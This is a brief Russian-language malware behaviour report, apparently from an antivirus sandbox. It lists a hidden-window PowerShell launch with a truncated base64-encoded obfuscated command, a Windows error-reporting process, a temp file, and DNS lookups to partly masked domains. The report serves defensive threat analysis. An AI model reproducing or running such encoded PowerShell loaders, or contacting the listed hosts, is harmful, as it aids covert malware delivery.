Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\851796.cvr
- DNS ASK se###ntel.com
- DNS ASK sn###cords.com
- DNS ASK sc###laert.eu
- DNS ASK si#####esponsive.com
- DNS ASK sh####kevault.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFUARwBfAEcAYwBBAFgAPQAoACcATABYACcAKwAnAEQAdwBVAEIAQQAnACkAOwAkAE0AQgBBAGsAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANgA5ACcAKQA7ACQAWQBrAFUAQQBBAEEAQQA9ACgAJwBwACcAKwAnAEQAQgBHAEEARwAnACsAJwBRAC...' (со скрытым окном)